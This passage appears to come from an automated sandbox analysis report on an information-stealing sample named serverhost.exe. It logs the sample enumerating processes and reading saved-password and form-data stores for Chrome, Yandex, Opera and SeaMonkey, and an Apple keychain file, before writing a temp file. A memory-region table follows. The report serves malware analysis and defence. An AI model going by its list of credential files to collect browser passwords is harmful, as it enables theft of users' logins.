| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Load | module_name = psapi.dll, base_address = 0x773f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleBaseNameW, address_out = 0x773f152c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = EnumProcessModules, address_out = 0x773f1408 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleFileNameExW, address_out = 0x773f13f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = EnumProcesses, address_out = 0x773f1544 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleInformation, address_out = 0x773f1420 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcessTimes, address_out = 0x765cf626 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\sdclt.exe, file_name_orig = C:\Program Files\Common Files\blowiranlaboratorydisaster.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\internet explorer\argentina conducting merchandise.exe, file_name_orig = C:\Program Files\Internet Explorer\argentina conducting merchandise.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\output.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Adobe\bookings.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\dvd maker\lyrics-morning-effectiveness.exe, file_name_orig = C:\Program Files\DVD Maker\lyrics-morning-effectiveness.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows defender\involved-int-antenna-lol.exe, file_name_orig = C:\Program Files\Windows Defender\involved-int-antenna-lol.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Microsoft Office\enterprise monsters comments.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\dvd maker\food_logos_lot.exe, file_name_orig = C:\Program Files\DVD Maker\food_logos_lot.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows sidebar\designed.exe, file_name_orig = C:\Program Files\Windows Sidebar\designed.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\chargetrackbacksobserve.exe, file_name_orig = C:\Program Files\Microsoft Office\chargetrackbacksobserve.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\msbuild\info-began-nobody-tops.exe, file_name_orig = C:\Program Files\MSBuild\info-began-nobody-tops.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\uninstall information\myers biggest qatar.exe, file_name_orig = C:\Program Files\Uninstall Information\myers biggest qatar.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\google\invalid.exe, file_name_orig = C:\Program Files\Google\invalid.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows nt\panel-maria-suggestion.exe, file_name_orig = C:\Program Files\Windows NT\panel-maria-suggestion.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows mail\remained universe sole.exe, file_name_orig = C:\Program Files\Windows Mail\remained universe sole.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\internet explorer\evanescence oscar em.exe, file_name_orig = C:\Program Files\Internet Explorer\evanescence oscar em.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\reference assemblies\fifth roller.exe, file_name_orig = C:\Program Files\Reference Assemblies\fifth roller.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows sidebar\irish.exe, file_name_orig = C:\Program Files\Windows Sidebar\irish.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft analysis services\advocate-keep.exe, file_name_orig = C:\Program Files\Microsoft Analysis Services\advocate-keep.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\distributors.exe, file_name_orig = C:\Program Files\Microsoft Office\distributors.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft.net\lighter.exe, file_name_orig = C:\Program Files\Microsoft.NET\lighter.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows sidebar\lease-entitled-pcs.exe, file_name_orig = C:\Program Files\Windows Sidebar\lease-entitled-pcs.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows media player\nerve-bracelet.exe, file_name_orig = C:\Program Files\Windows Media Player\nerve-bracelet.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Office15\WINWORD.EXE, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe |
|
1 | |
| File | Get Info | filename = C:\Program Files\Sea Monkey\nss3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_READ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 100, size_out = 100 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 2048, size_out = 2048 |
|
4 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, size = 16, size_out = 16 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 100, size_out = 100 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 2048, size_out = 2048 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 16, size_out = 16 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data, size = 2048, size_out = 2048 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Apple Computer\Preferences\keychain.plist, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera\Opera7\profile\wand.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data, type = file_attributes |
|
1 | |
| File | Create | filename = C:\ProgramData\C571.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 3 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 11 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 9 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 8 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 17 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 15 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 14 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 13 |
|
1 | |
| File | Write | filename = C:\ProgramData\C571.tmp, size = 2 |
|
1 |
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:47, Reason: Autostart |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:38 |
| Information | Value |
|---|---|
| PID | 0x744 |
| Parent PID | 0x600 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
748
0x
784
0x
7B0
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00040000 | 0x000a6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x00177fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00196fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| windowsshell.manifest | 0x001d0000 | 0x001d0fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| rpcss.dll | 0x00400000 | 0x0045bfff | Memory Mapped File | Readable |
|
|
|
|
| rpcss.dll | 0x00400000 | 0x0045bfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | Readable |
|
|
|
|
| cversions.1.db | 0x00410000 | 0x00413fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00418fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0041cfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x00420000 | 0x0043cfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000440000 | 0x00440000 | 0x00440fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x00473fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x00461fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000470000 | 0x00470000 | 0x00481fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x00488fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x005b3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x005a1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x005bcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x00717fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000760000 | 0x00760000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000760000 | 0x00760000 | 0x0083efff | Pagefile Backed Memory | Readable |
|
|
|
|
